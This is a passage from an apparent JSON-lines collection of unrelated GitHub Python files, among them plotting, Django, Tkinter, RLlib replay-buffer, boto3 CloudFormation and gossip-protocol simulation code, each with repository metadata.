g.add_vertex(vertex)\n\n    for v in range(len(vertices)):\n        v_idx = randrange(0, len(vertices) - 1)\n        v1 = vertices[v_idx]\n        v_idx = randrange(0, len(vertices) - 1)\n        v2 = vertices[v_idx]\n        g.add_edge(v1, v2, randrange(1, 10))\n\n    print_graph(g)\n\nbuild_graph(False)\n","repo_name":"KevMantis/python_practice","sub_path":"graphs/graphs1_intro.py","file_name":"graphs1_intro.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}{"seq_id":"16784743781","text":"from pathlib import Path\nimport datetime\n\nfrom tqdm import tqdm\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\ndef make_plots(datapath, measures, show=False):\n\n    # get the data\n    pkl_files = list(Path(datapath).glob(\"*.pkl\"))\n    if len(pkl_files) == 0:\n        print(f\"No files found in '{datapath}'\")\n        exit()\n    \n    # make a unique save folder\n    savepath = Path(f\"output/figures/{datapath.stem}\")\n    # savepath = Path(f\"deepCA/figures/{datetime.datetime.now().strftime('%Y%m%d%H%M%S')}\")\n    savepath.mkdir(parents=True, exist_ok=True)\n    \n    # join datasets from datapath folder\n    df = pd.concat(\n        [pd.read_pickle(f) for f in pkl_files],\n        axis=0,\n        join=\"outer\",\n        # ignore_index=True,\n        keys=[f.stem for f in pkl_files],\n    )\n\n    print(\"Matrices =\", len(df[\"filename\"].unique()))\n\n    # delete \"Real_Network\" (duplicate of \"Real Network\")\n    delete_idxs = df[ df[\"filename:topology_type\"] == \"Real_Network\"].index\n    df.drop(delete_idxs, inplace=True)\n\n    for dataset in df[\"dataset\"].unique(): # look through all datasets\n        for forecast in df[\"forecast\"].loc[(df[\"dataset\"] == dataset)].unique(): # look through all forecast levels for each dataset type\n            for measure in measures: # look through all given quality measures\n\n                # make plot\n                ax = sns.boxplot(\n                    
x=\"filename:topology_type\",\n y=measure,\n hue=\"filename:sr\",\n data=df.loc[\n (df[\"dataset\"] == dataset) &\n (df[\"forecast\"] == forecast),\n ],\n order=np.sort(df[\"filename:topology_type\"].unique()),\n hue_order=np.sort(df[\"filename:sr\"].unique()),\n )\n\n # include hyperparameters and mean in title\n leak_rate = df[\"leak_rate\"].iat[0]\n input_scaling = df[\"input_scaling\"].iat[0]\n input_conn = df[\"input_connectivity\"].iat[0]\n regularization = df[\"regularization\"].iat[0]\n mean = df[measure].loc[\n (df[\"dataset\"] == dataset) &\n (df[\"forecast\"] == forecast),\n ].mean()\n max = df[measure].loc[\n (df[\"dataset\"] == dataset) &\n (df[\"forecast\"] == forecast),\n ].max()\n min = df[measure].loc[\n (df[\"dataset\"] == dataset) &\n (df[\"forecast\"] == forecast),\n ].min()\n # print(measure, dataset, forecast, mean, max, min)\n\n # esthetics\n ax.set(\n title=f\"leak_rate={leak_rate}, input_scaling={input_scaling}, input_conn={input_conn}, reg={regularization}\\ndataset={dataset}, forecast={forecast}, avg. {measure}={mean:.2f}, max={max:.2f}, min={min:.2f}\",\n xlabel=\"Topology type\",\n ylabel=measure.upper(),\n yticks=(0, 0.5, 1),\n )\n ax.set_ylim(0, 1)\n\n ax.legend(\n title=\"Spectral radius\",\n )\n\n # save and/or display\n fig = ax.get_figure()\n fig.set_size_inches(12, 6)\n fig.savefig(Path(f\"{savepath}/{measure}-{dataset}-{forecast}\"))\n if show:\n plt.show()\n plt.close()\n\n# make plots\nif __name__ == \"__main__\":\n make_plots(\n Path(\"output\\data\\demo\"),\n measures=[\"r2\", \"nrmse\"])","repo_name":"wehak/deepCA_reservoirpy","sub_path":"plot_scripts/batch_plot_accuracy_results.py","file_name":"batch_plot_accuracy_results.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29928584257","text":"from django.urls import path\nfrom . import views\nfrom . 
import apis\n# every page name and route\nurlpatterns = [\n    path('',views.index,name=\"indexpage\"),\n    path('checking', views.checking, name='checking'),\n    # path('sign',views.sign,name=\"signup_back\"),\n    # path('login',views.login,name=\"signup_back\"),\n    path('auth-login-basic',views.auth_login_basic,name='log_front'),\n    path('auth-register-basic',views.auth_register_basic,name='log_front'),\n    path('data',views.data,name='data'),\n    path('selected',apis.selected,name=\"sources\"),\n    path('login',apis.login,name='login'),\n    path('sign',apis.sign,name='sign')\n]","repo_name":"krunalpabari13/Python_project","sub_path":"log/myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}{"seq_id":"42644550446","text":"\r\n\r\nfrom tkinter import Tk\r\nfrom tkinter import Button\r\nfrom tkinter.filedialog import *\r\nfrom tkinter import *\r\nfrom tkinter.messagebox import showerror\r\n\r\nclass Data:\r\n    def __init__(self):\r\n        self.keyList=[]\r\n        self.info={}\r\n    def setKey(self,key):\r\n        self.keyList.append(key)\r\n    def setKeyData(self,key,value):\r\n        self.info[key]=value\r\n\r\n    def getKey(self,key):\r\n        return self.info.get(key)\r\nclass WorkPanel():\r\n    def __init__(self,root):\r\n        self.root=root\r\n        self.fileOne=None\r\n        self.fileTwo=None\r\n        self.initView()\r\n    def initView(self):\r\n        self.root.geometry('1000x700')\r\n        self.root.title(\"File Comparison Tool\")\r\n\r\n        btn1=Button(self.root,text=\"Select File One\")\r\n\r\n        btn1.grid(row=0,column=0,sticky=W)\r\n        # btn1.place(x=0,y=10)\r\n\r\n        btn2 = Button(self.root, text=\"Select File Two\")\r\n        # btn2.place(x=80, y=10)\r\n        btn2.grid(row=0,column=1)\r\n\r\n        btn3 = Button(self.root, text=\"Compare\")\r\n        # btn3.place(x=160, y=10)\r\n        btn3.grid(row=0,column=2)\r\n\r\n        btn4 = Button(self.root, text=\"Clear Content\")\r\n        btn4.grid(row=0,column=3)\r\n        # btn4.place(x=240, y=10)\r\n\r\n        btn2[\"command\"]=lambda btnName=\"btn2\":self.doAction(btnName)\r\n        btn1[\"command\"]=lambda btnName=\"btn1\":self.doAction(btnName)\r\n        btn3[\"command\"] = lambda btnName=\"btn3\": self.doAction(btnName)\r\n        btn4[\"command\"] = lambda btnName=\"btn4\": self.doAction(btnName)\r\n\r\n        self.lb1=Label(self.root,text=\"File One Path:\")\r\n        self.lb1.grid(row=1,column=0,padx=5,sticky=W)\r\n        self.lb2=Label(self.root,text=\"File Two Path:\")\r\n        self.lb2.grid(row=2,column=0,padx=5,sticky=W)\r\n\r\n        s1= Scrollbar(root)\r\n        s2=Scrollbar(root)\r\n        self.t1=Text(self.root,height=45,width=70)\r\n        self.t1.grid(row=4,column=0,columnspan=6,padx=5)\r\n        self.t1.insert(1.0,\"File One Content:\\n\")\r\n\r\n        self.t2=Text(self.root,height=45,width=70)\r\n        s1.grid(row=4,column=7,sticky=N+S+W+E)\r\n        self.t2.grid(row=4,column=6,columnspan=6,padx=5)\r\n        self.t2.insert(1.0,\"File Two Content:\\n\")\r\n        s2.grid(row=4,column=13,sticky=N+S+W+E)\r\n        self.t1.config(yscrollcommand=s1.set)\r\n        s1.config(command=self.t1.yview)\r\n\r\n        self.t2.config(yscrollcommand=s2.set)\r\n        s2.config(command=self.t2.yview)\r\n    def doAction(self,btnName):\r\n        if btnName==\"btn1\":\r\n            self.fileOne=fileOne=askopenfilename()\r\n            if not fileOne:return\r\n            self.lb1[\"text\"]=self.lb1[\"text\"]+\" \"+fileOne\r\n        if btnName==\"btn2\":\r\n            self.fileTwo=fileTwo = askopenfilename()\r\n            if not fileTwo: return\r\n            self.lb2[\"text\"]=self.lb2[\"text\"]+\" \"+fileTwo\r\n\r\n        if btnName==\"btn3\":\r\n            if not self.fileOne or not self.fileTwo:\r\n                showerror(\"error\",\"Please select two files to compare\")\r\n                return\r\n            self.sortValue(self.fileOne,self.fileTwo)\r\n\r\n        if btnName==\"btn4\":\r\n            self.t1.delete(0.0,END)\r\n            self.t2.delete(0.0, END)\r\n\r\n            self.t1.insert(1.0, \"File One Content:\\n\")\r\n            self.t2.insert(1.0, \"File Two Content:\\n\")\r\n\r\n    def replace(self,value):\r\n        value=value.replace(\"”\",\"\")\r\n        value=value.replace(\"“\",\"\")\r\n        value=value.replace(\"\\\"\",\"\")\r\n        return value.strip()\r\n    def getData(self,fileObj,data):\r\n        with open(fileObj,\"r\",encoding=\"utf-8\") as f1:\r\n            for line in f1:\r\n                if \"#\" in line or \"//\" in line:continue\r\n                if len(line.split(\"=\"))<=1:continue\r\n                key=line.split(\"=\")[0]\r\n                value=line.split(\"=\")[1]\r\n                key=self.replace(key)\r\n                value=self.replace(value)\r\n                data.setKey(key)\r\n                data.setKeyData(key,value)\r\n    def sortValue(self,fileOne,fileTwo):\r\n        self.first=Data()\r\n        self.two=Data()\r\n        self.getData(fileOne,self.first)\r\n        self.getData(fileTwo,self.two)\r\n        self.showSame()\r\n    def showSame(self):\r\n        self.sameOne=self.first.keyList\r\n        self.sameTwo=self.two.keyList\r\n        keySame=set(self.sameOne).intersection(self.sameTwo)\r\n        differentOne=set(self.sameOne).difference(self.sameTwo)\r\n        differentTwo=set(self.sameTwo).difference(self.sameOne)\r\n        self.t1.tag_config('a', foreground='red')\r\n        self.t1.tag_config('b', foreground='blue')\r\n\r\n        self.t2.tag_config('a', foreground='red')\r\n        self.t2.tag_config('b', foreground='blue')\r\n\r\n        self.t1.insert(END, \"==========================Same===============================\\n\")\r\n        self.t2.insert(END, \"==========================Same==============================\\n\")\r\n        scroll1 = Scrollbar()\r\n        scroll2 =Scrollbar()\r\n        # scroll1.place(x=10,y=10)\r\n        scroll1.config(command=self.t1.yview)  # link the text box to the scrollbar: when the scrollbar slides, the text box scrolls with it\r\n        self.t1.config(yscrollcommand=scroll1.set)\r\n\r\n        scroll2.config(command=self.t2.yview)  # link the text box to the scrollbar: when the scrollbar slides, the text box scrolls with it\r\n        self.t2.config(yscrollcommand=scroll2.set)\r\n\r\n        for same in keySame:\r\n            value=\"\\\"{}\\\"\".format(same)\r\n            self.t1.insert(END,value,\"b\")\r\n            self.t1.insert(END, \"= \\\"{}\\\"\\n\".format(self.first.getKey(same)))\r\n            self.t2.insert(END, value, \"b\")\r\n            self.t2.insert(END, \"= \\\"{}\\\"\\n\".format(self.two.getKey(same)))\r\n\r\n\r\n\r\n        self.t1.insert(END, \"===========================Different===============================\\n\")\r\n        self.t2.insert(END, \"==========================Different================================\\n\")\r\n\r\n\r\n        for difA in differentOne:\r\n            value = \"\\\"{}\\\"\".format(difA)\r\n            self.t1.insert(END, value, \"a\")\r\n            self.t1.insert(END, \"= \\\"{}\\\"\\n\".format(self.first.getKey(difA)))\r\n\r\n        for difB in differentTwo:\r\n            value = \"\\\"{}\\\"\".format(difB)\r\n            self.t2.insert(END, value, \"a\")\r\n            self.t2.insert(END, \"= \\\"{}\\\"\\n\".format(self.two.getKey(difB)))\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    root=Tk()\r\n    work=WorkPanel(root)\r\n    root.mainloop()","repo_name":"heyonly/Translate","sub_path":"Translate/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}{"seq_id":"11004918464","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\n\nimport argparse\nfrom voc import make_voc\nfrom yolo import make_yolo\nfrom coco import make_coco\n\nif __name__==\"__main__\":\n\n    parser=argparse.ArgumentParser()\n    parser.add_argument(\"--detected_dir\",type=str,help=\"the directory of detection results\",default=\"/home/b_xi/Detection\")\n    parser.add_argument(\"--image_path\",type=str,help=\"the directory of original images\",default=\"/home/b_xi/car8\")\n    parser.add_argument(\"--saved_dir\",type=str,help=\"the 
directory you want to save the converted result\",default=\"/home/b_xi/VOC2007\")\n parser.add_argument(\"--train_percent\",type=float,default=0.9)\n parser.add_argument(\"--convert_to\",type=str,default='coco',help=\"the format you want to save to\")\n args = parser.parse_args()\n\n if args.convert_to == \"voc\":\n make_voc(args)\n if args.convert_to==\"yolo\":\n make_yolo(args)\n if args.convert_to==\"coco\":\n make_coco(args)\n\n\n\n","repo_name":"BoXiao123/label_image","sub_path":"img_label_api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"42083128680","text":"import numpy as np\r\nimport random\r\nfrom ray.rllib.utils.annotations import DeveloperAPI\r\nfrom ray.rllib.utils.compression import unpack_if_needed\r\nfrom ray.rllib.execution.replay_ops import SimpleReplayBuffer\r\n\r\n\r\n@DeveloperAPI\r\nclass ReservoirBuffer:\r\n @DeveloperAPI\r\n def __init__(self, size):\r\n \"\"\"Create Reservoir buffer.\r\n Inspired to ray.rllib.optimizers.replay_buffer.ReplayBuffer\r\n Parameters\r\n ----------\r\n size: int\r\n Max number of transitions to store in the buffer. When the buffer\r\n overflows the old memories are dropped.\r\n \"\"\"\r\n self._storage = []\r\n self._maxsize = size\r\n self._next_idx = 0\r\n self._hit_count = np.zeros(int(size))\r\n self._num_added = 0\r\n self._num_sampled = 0\r\n self._episodes_registry = {}\r\n\r\n def __len__(self):\r\n return len(self._storage)\r\n\r\n @DeveloperAPI\r\n def add(self, obs_t, action, eps_id=None):\r\n data = (obs_t, action)\r\n self._num_added += 1\r\n\r\n if len(self._storage) < self._maxsize:\r\n self._storage.append(data)\r\n\r\n else:\r\n idx = np.random.randint(0, self._num_added + 1)\r\n if idx < self._maxsize:\r\n self._storage[idx] = data\r\n\r\n def _encode_sample(self, idxes):\r\n obses_t, actions = [], []\r\n for i in idxes:\r\n data = self._storage[i]\r\n obs_t, action = data\r\n obses_t.append(np.array(unpack_if_needed(obs_t), copy=False))\r\n actions.append(np.array(action, copy=False))\r\n\r\n self._hit_count[i] += 1\r\n return np.array(obses_t), np.array(actions)\r\n\r\n @DeveloperAPI\r\n def sample_idxes(self, batch_size):\r\n return np.random.randint(0, len(self._storage), batch_size)\r\n\r\n @DeveloperAPI\r\n def sample_with_idxes(self, idxes):\r\n self._num_sampled += len(idxes)\r\n return self._encode_sample(idxes)\r\n\r\n @DeveloperAPI\r\n def sample(self, batch_size):\r\n \"\"\"Sample a batch of experiences.\r\n Parameters\r\n ----------\r\n batch_size: int\r\n How many transitions to sample.\r\n Returns\r\n -------\r\n obs_batch: np.array\r\n batch of observations\r\n act_batch: np.array\r\n batch of actions executed given obs_batch\r\n \"\"\"\r\n idxes = [\r\n random.randint(0,\r\n len(self._storage) - 1) for _ in range(batch_size)\r\n ]\r\n self._num_sampled += batch_size\r\n return self._encode_sample(idxes)\r\n\r\n @DeveloperAPI\r\n def stats(self, debug=False):\r\n data = {\r\n \"added_count\": self._num_added,\r\n \"sampled_count\": self._num_sampled,\r\n \"num_entries\": len(self._storage),\r\n }\r\n return data\r\n\r\n\r\nclass MultiAgentReservoirBuffer:\r\n \"\"\"\r\n Class for multi-agent reservoir buffer.\r\n parameters\r\n \"\"\"\r\n def __init__(self, size, policies):\r\n self.buffers = {}\r\n self.steps = {}\r\n self.fake = []\r\n self.policies = policies\r\n for policy_id in policies.keys():\r\n self.buffers[policy_id] = ReservoirBuffer(size)\r\n 
self.steps[policy_id] = 0\r\n\r\n\r\n@DeveloperAPI\r\nclass SimpleReservoirBuffer:\r\n @DeveloperAPI\r\n def __init__(self, size):\r\n \"\"\"Create Reservoir buffer.\r\n Inspired to ray.rllib.optimizers.replay_buffer.ReplayBuffer\r\n Parameters\r\n ----------\r\n size: int\r\n Max number of transitions to store in the buffer. When the buffer\r\n overflows the old memories are dropped.\r\n \"\"\"\r\n self._storage = []\r\n self._eps_dict = {}\r\n self._maxsize = size\r\n self._next_idx = 0\r\n self._hit_count = np.zeros(int(size))\r\n self._num_added = 0\r\n self._num_sampled = 0\r\n self._episodes_registry = {}\r\n\r\n def __len__(self):\r\n return len(self._storage)\r\n\r\n @DeveloperAPI\r\n def add(self, episode_sample, eps):\r\n if eps in self._episodes_registry:\r\n idx = self._episodes_registry[eps]\r\n ss = self._storage[idx][0]\r\n out_batch = []\r\n for k in range(len(ss)):\r\n if episode_sample[k] is None:\r\n if ss[k] is None:\r\n out_batch.append(None)\r\n else:\r\n out_batch.append(ss[k])\r\n else:\r\n if ss[k] is None:\r\n out_batch.append(episode_sample[k].compress(bulk=True))\r\n else:\r\n ss[k].decompress_if_needed()\r\n episode_sample[k].decompress_if_needed()\r\n b = ss[k].concat(episode_sample[k])\r\n b.compress(bulk=True)\r\n out_batch.append(b)\r\n self._storage[idx] = (out_batch, eps)\r\n\r\n else:\r\n self._num_added += 1\r\n if len(self._storage) < self._maxsize:\r\n self._storage.append((episode_sample, eps))\r\n self._episodes_registry[eps] = len(self._storage) - 1\r\n\r\n else:\r\n idx = np.random.randint(0, self._num_added + 1)\r\n if idx < self._maxsize:\r\n episode_out = self._storage[idx][1]\r\n self._episodes_registry.pop(episode_out)\r\n self._storage[idx] = (episode_sample, eps)\r\n self._episodes_registry[eps] = idx\r\n\r\n def _encode_sample(self, idxes):\r\n obses_t, actions = [], []\r\n for i in idxes:\r\n data = self._storage[i]\r\n obs_t, action = data\r\n obses_t.append(np.array(unpack_if_needed(obs_t), copy=False))\r\n actions.append(np.array(action, copy=False))\r\n\r\n self._hit_count[i] += 1\r\n return np.array(obses_t), np.array(actions)\r\n\r\n @DeveloperAPI\r\n def sample_idxes(self, batch_size):\r\n return np.random.randint(0, len(self._storage), batch_size)\r\n\r\n @DeveloperAPI\r\n def sample_with_idxes(self, idxes):\r\n self._num_sampled += len(idxes)\r\n return self._encode_sample(idxes)\r\n\r\n @DeveloperAPI\r\n def sample(self, batch_size):\r\n \"\"\"Sample a batch of experiences.\r\n Parameters\r\n ----------\r\n batch_size: int\r\n How many transitions to sample.\r\n Returns\r\n -------\r\n obs_batch: np.array\r\n batch of observations\r\n act_batch: np.array\r\n batch of actions executed given obs_batch\r\n \"\"\"\r\n observations = []\r\n actions = []\r\n in_episode_samples = batch_size\r\n episode_size = int(batch_size/in_episode_samples)\r\n for i in range(episode_size):\r\n episode_idx = random.randint(0, len(self._storage)-1)\r\n while any([x==None for x in self._storage[episode_idx][0]]):\r\n episode_idx = random.randint(0, len(self._storage)-1)\r\n episode_sample = self._storage[episode_idx][0]\r\n for _ in range(in_episode_samples):\r\n obs = []\r\n ac = []\r\n for policy_batch in episode_sample:\r\n policy_batch.decompress_if_needed()\r\n num_samples = policy_batch.count\r\n sample_idx = np.random.randint(0, num_samples)\r\n o = unpack_if_needed(policy_batch['obs'][sample_idx])\r\n a = policy_batch['actions'][sample_idx]\r\n # o = unpack_if_needed(policy[0])\r\n # traj_ids = np.random.randint(0, len(o))\r\n 
obs.append(o)\r\n ac.append(a)\r\n observations.append(obs)\r\n actions.append(ac)\r\n\r\n return np.array(observations, copy=False).reshape(batch_size, -1),\\\r\n np.array(actions, copy=False).reshape(batch_size, -1)\r\n\r\n\r\nclass MultiAgentSimpleReservoirBuffer:\r\n \"\"\"\r\n Class for multi-agent reservoir buffer.\r\n parameters\r\n \"\"\"\r\n def __init__(self, size, policies):\r\n self.buffers = {}\r\n self.steps = {}\r\n self.policies = policies\r\n for policy_id in policies.keys():\r\n self.buffers[policy_id] = SimpleReservoirBuffer(size)\r\n self.steps[policy_id] = 0\r\n\r\n","repo_name":"fedcacc/SIMS_pytorch","sub_path":"optimizers/reservoir_buffer.py","file_name":"reservoir_buffer.py","file_ext":"py","file_size_in_byte":8343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42622930916","text":"from datetime import datetime\nimport logging\nimport json\nimport sys\n\nimport boto3\nimport botocore\n\n\ncf = boto3.client('cloudformation') # pylint: disable=C0103\nlog = logging.getLogger('deploy.cf.create_or_update')\n\n\ndef main(json_file):\n\n\tjson_data = _parse_json(json_file)\n\n\tstack_name = json_data['Stack']['Properties']['StackName']\n\n\tparams = {\n\t\t'StackName' : stack_name,\n\t\t#'RetainResources' : ,\n\t}\n\ttry:\n\t\tif _stack_exists(stack_name):\n\t\t\tprint('Deleting {}'.format(stack_name))\n\t\t\tstack_result = cf.delete_stack(**params)\n\t\t\twaiter = cf.get_waiter('stack_delete_complete')\n\t\t\t\n\t\telse:\n\t\t\tprint('No Stack!!!')\n\t\t\treturn\n\n\t\tprint(\"...waiting for stack to be ready...\")\n\t\twaiter.wait(StackName=stack_name)\n\n\n\texcept botocore.exceptions.ClientError as ex:\n\t\terror_message = ex.response['Error']['Code']\n\t\tprint(\"Error Code: {} \".format(error_message))\n\n\t\traise\n\n\t\t#if error_message == 'No updates are to be performed.':\n\t\t#\tprint(\"No changes\")\n\t\t#else:\n\t\t#\traise\n\telse:\n\t\tprint('{} Stack Delete!!!'.format(stack_name))\n\t\t\"\"\"\n\t\tprint(json.dumps(\n\t\t\tcf.describe_stacks(\n\t\t\t\tStackName=stack_result['StackId']),\n\t\t\t\tindent=2,\n\t\t\t\tdefault=json_serial\n\t\t\t)\n\t\t)\n\t\t\"\"\"\n\ndef _parse_json(json_file):\n\twith open(json_file) as json_fileobj:\n\t\tjson_data = json.load(json_fileobj)\n\treturn json_data\n\n\ndef _stack_exists(stack_name):\n\tstacks = cf.list_stacks()['StackSummaries']\n\tfor stack in stacks:\n\t\tif stack['StackStatus'] == 'DELETE_COMPLETE':\n\t\t\tcontinue\n\t\tif stack_name == stack['StackName']:\n\t\t\treturn True\n\treturn False\n\n\ndef json_serial(obj):\n\t\"\"\"JSON serializer for objects not serializable by default json code\"\"\"\n\tif isinstance(obj, datetime):\n\t\tserial = obj.isoformat()\n\t\treturn serial\n\traise TypeError(\"Type not serializable\")\n\n\nif __name__ == '__main__':\n\tmain(*sys.argv[1:])\n","repo_name":"heyoon2j/cloudformation-ansible","sub_path":"boto3/cloudformation/cf_delete.py","file_name":"cf_delete.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12641307186","text":"import typing\n\nimport django.core.serializers.json\nfrom django.db import models\nfrom django.contrib.auth import get_user_model\nfrom django.utils.translation import gettext_lazy as _\n\nfrom tulius.forum.comments import models as comment_models\n\nUser = get_user_model()\n\n\nclass AbstractCommentLike(models.Model):\n class Meta:\n verbose_name = _('comment like')\n 
verbose_name_plural = _('comments likes')\n abstract = True\n\n objects = models.Manager() # linter, be happy\n\n user = models.ForeignKey(\n User, models.PROTECT,\n null=False,\n blank=False,\n related_name='liked_comments',\n verbose_name=_('user'),\n )\n comment = models.ForeignKey(\n comment_models.Comment, models.PROTECT,\n null=False,\n blank=False,\n related_name='liked',\n verbose_name=_('comment'),\n )\n data: typing.Dict = models.JSONField(\n default=dict,\n encoder=django.core.serializers.json.DjangoJSONEncoder)\n\n\nclass CommentLike(AbstractCommentLike):\n pass\n\n\nclass AbstractVotingVote(models.Model):\n \"\"\"\n Voting choice\n \"\"\"\n class Meta:\n verbose_name = _('voting vote')\n verbose_name_plural = _('voting votes')\n unique_together = ('user', 'comment')\n abstract = True\n\n choice = models.IntegerField(\n blank=False,\n null=False,\n verbose_name=_('choice')\n )\n user = models.ForeignKey(\n User, models.PROTECT,\n null=False,\n blank=False,\n verbose_name=_('user'),\n related_name='voting_votes',\n )\n comment = models.ForeignKey(\n comment_models.Comment, models.PROTECT,\n null=False,\n blank=False,\n related_name='votes',\n verbose_name=_('comment'),\n )\n\n def __str__(self):\n return f'{self.comment.title} - {self.choice}({self.user})'\n\n\nclass VotingVote(AbstractVotingVote):\n pass\n","repo_name":"kozzztik/tulius","sub_path":"tulius/forum/other/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"71949944245","text":"import simulus, random, argparse, textwrap, math, time\n\nst = time.time()\ndef BLOCK_LOW(id,p,n): return int(id*n/p)\ndef BLOCK_HIGH(id,p,n): return BLOCK_LOW(id+1,p,n)-1\ndef BLOCK_SIZE(id,p,n): return BLOCK_LOW(id+1)-BLOCK_LOW(id)\ndef BLOCK_OWNER(index,p,n): return int((p*(index+1)-1)/n)\n\ntimeout1 = 1\ntimeout2 = 2\n\nclass msg2:\n def __init__(self,type,m,mID,round,sender):\n self.type = type\n self.payload = m\n self.ID = int(mID)\n self.round = int(round)\n self.sender = int(sender)\n\nclass node(object):\n def __init__(self, sim, idx,total_nodes,lookahead):\n self.lookahead = lookahead\n self.sim = sim\n self.total_nodes = total_nodes\n self.node_idx = idx\n self.eagerPushPeers = []\n self.lazyPushPeers = []\n self.lazyQueues = []\n self.missing = []\n self.receivedMsgs = {}\n self.timers = {}\n self.mbox = sim.mailbox(name='mb%d'%idx, min_delay=lookahead)\n sim.process(self.receive)\n\n def eagerPush(self,msg, mID, round, sender):\n c = 0\n for n in self.eagerPushPeers:\n #delay = self.sim.rng().expovariate(1)+self.lookahead\n delay = self.lookahead\n if n != sender:\n c+=1\n self.sim.sync().send(self.sim, 'mb%d'% n, ('GOSSIP-'+msg+'-'+str(mID)+'-'+str(round)+'-'+str(self.node_idx)),delay*c)\n\n def lazyPush(self,msg, mID, round, sender):\n for n in self.lazyPushPeers:\n if n != sender:\n #delay = self.sim.rng().expovariate(1)+self.lookahead\n delay = self.lookahead\n m = 'IHAVE-'+\"\"+'-'+str(mID)+'-'+str(round)+'-'+str(self.node_idx)\n self.sim.sync().send(self.sim, 'mb%d'% n, m,delay)\n\n def msg(type,m,mID,round,sender):\n return \"%s-%s-%d-%d-%d\"%(type,m,mID,round,sender)\n\n def receive(self):\n self.eagerPushPeers = self.getPeers()\n v = 1\n while v == 1:\n m = self.mbox.recv(isall=False)\n m2 = m.split(\"-\")\n msg = msg2(m2[0],m2[1],m2[2],m2[3],m2[4])\n print(\"%g: '%s' rcvd msg '%s' %d round:%d\" % (self.sim.now, self.sim.name, msg.type,msg.sender,msg.round))\n if msg.type =='PRUNE':\n if 
msg.sender in self.eagerPushPeers:\n self.eagerPushPeers.remove(msg.sender)\n if msg.sender not in self.lazyPushPeers:\n self.lazyPushPeers.append(msg.sender)\n\n elif msg.type =='IHAVE':\n if msg.ID not in self.receivedMsgs.keys():\n # setup timer\n self.missing.append((msg.ID,msg.sender,msg.round))\n if msg.ID not in self.timers.keys():\n self.timers[msg.ID] = self.sim.sched(self.timer,until=self.sim.now+self.lookahead,mID=msg.ID)\n\n\n elif msg.type =='GRAFT':\n if msg.sender not in self.eagerPushPeers:\n self.eagerPushPeers.append(msg.sender)\n if msg.sender in self.lazyPushPeers:\n self.lazyPushPeers.remove(msg.sender)\n if msg.ID in self.receivedMsgs.keys():\n #delay = self.sim.rng().expovariate(1)+self.lookahead\n delay = self.lookahead\n msgS = ('GOSSIP-'+self.receivedMsgs[msg.ID]+'-'+str(msg.ID)+'-'+str(msg.round)+'-'+str(self.node_idx))\n self.sim.sync().send(self.sim, 'mb%d'% msg.sender, msgS,delay)\n\n elif msg.type =='GOSSIP':\n if msg.ID not in self.receivedMsgs.keys():\n self.receivedMsgs[msg.ID] = msg.payload\n\n if msg.ID in self.timers.keys():\n #print(\"timer cancel\")\n self.sim.cancel(self.timers[msg.ID])\n self.timers.pop(msg.ID)\n\n self.eagerPush(msg.payload,msg.ID,msg.round+1,self.node_idx)\n self.lazyPush(msg.payload,msg.ID,msg.round+1,self.node_idx)\n\n if msg.sender not in self.eagerPushPeers:\n self.eagerPushPeers.append(msg.sender)\n if msg.sender in self.lazyPushPeers:\n self.lazyPushPeers.remove(msg.sender)\n else:\n if msg.sender in self.eagerPushPeers:\n self.eagerPushPeers.remove(msg.sender)\n if msg.sender not in self.lazyPushPeers:\n self.lazyPushPeers.append(msg.sender)\n #delay = self.sim.rng().expovariate(1)+self.lookahead\n delay = self.lookahead\n self.sim.sync().send(self.sim, 'mb%d'% msg.sender, ('PRUNE--0-0-'+str(self.node_idx)),delay)\n\n elif msg.type =='BROADCAST':\n mID = msg.ID\n self.eagerPush(msg.payload,mID,0,self.node_idx)\n self.lazyPush(msg.payload,mID,0,self.node_idx)\n self.receivedMsgs[mID] = msg.payload\n\n def timer(self,**args):\n mID = args[\"mID\"]\n #print(str(self.sim.now)+\"------started timer for mID:\"+str(mID)+\" on node \"+str(self.node_idx))\n m = (mID,0,0)\n for p in self.missing:\n if p[0] == mID:\n m = p\n self.missing.remove(p)\n if m[1] not in self.eagerPushPeers:\n self.eagerPushPeers.append(m[1])\n if m[1] in self.lazyPushPeers:\n self.lazyPushPeers.remove(m[1])\n #delay = self.sim.rng().expovariate(1)+self.lookahead\n delay = self.lookahead\n msg = ('GRAFT--'+str(mID)+'-'+str(m[2])+'-'+str(self.node_idx))\n self.sim.sync().send(self.sim, 'mb%d'% m[1], msg,delay)\n self.timers[mID] = self.sim.sched(self.timer,**args, offset=timeout2)\n\n def getPeers(self):\n neighbors_list=[]\n lsize = int(math.sqrt(self.total_nodes))\n idx = self.node_idx\n xp = idx // lsize\n yp = idx % lsize\n\n rxmin = xp - 2\n rxmax = xp + 2\n rymin = yp - 2\n rymax = yp + 2\n\n if rxmin < 0:\n rxmin = 0\n if rxmax > lsize:\n rxmax = lsize\n if rymin < 0:\n rymin = 0\n if rymax > lsize:\n rymax = lsize\n\n for x in range(rxmin,rxmax):\n for y in range(rymin,rymax):\n peer = (x * lsize) + y\n if peer!=idx and self.distance(peer) args.total_nodes:\n raise ValueError('nsims must be an integer between PSIZE (%d) and NNODES (%d)' %\n (psize, args.total_nodes))\n\nif rank == 0:\n print('> MODEL PARAMETERS:')\n print('>> TOTAL NODES:', args.total_nodes)\n print('>> LOOKAHEAD:', args.lookahead)\n print('>> CHOICE:', 